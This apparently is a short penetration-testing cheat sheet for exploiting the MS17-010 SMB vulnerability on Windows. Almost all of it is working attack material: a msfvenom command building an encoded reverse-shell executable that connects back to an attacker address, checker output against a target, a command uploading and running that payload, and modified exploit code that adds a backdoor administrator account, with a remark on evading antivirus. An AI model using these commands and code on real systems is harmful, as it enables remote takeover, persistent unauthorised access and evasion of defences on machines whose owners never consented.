# MS17-010

{% embed url="<https://github.com/helviojunior/MS17-010>" %}

### With Executable

```
$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 EXITFUNC=thread -f exe -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -o reverse.exe
```

```
$ python checker.py 192.168.1.2

Trying to connect to 192.168.1.2:445
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (32 bit)
lsarpc: Ok (32 bit)
browser: Ok (32 bit)
```

```
python send_and_execute.py <ip> <executable_file> [port] [pipe_name]

$ python send_and_execute.py 192.168.1.2 reverse.exe 445 browser
```

### With Adding User

If there is an AV, you can not upload executable file. Instead of uploading, you can create an administrator account. Or you can do AV evasion. :)

<https://www.exploit-db.com/exploits/42315>

Change smb\_pwn function content is to below.

```
def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	print('creating file c:\\pwned.txt on the target')
	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
	service_exec(conn, r'cmd /c net user cel1s0 password /add')
	service_exec(conn, r'cmd /c net localgroup administrators cel1s0 /add')  
#	smbConn.closeFile(tid2, fid2)
	smbConn.closeFile(tid2)
	smbConn.disconnectTree(tid2)
```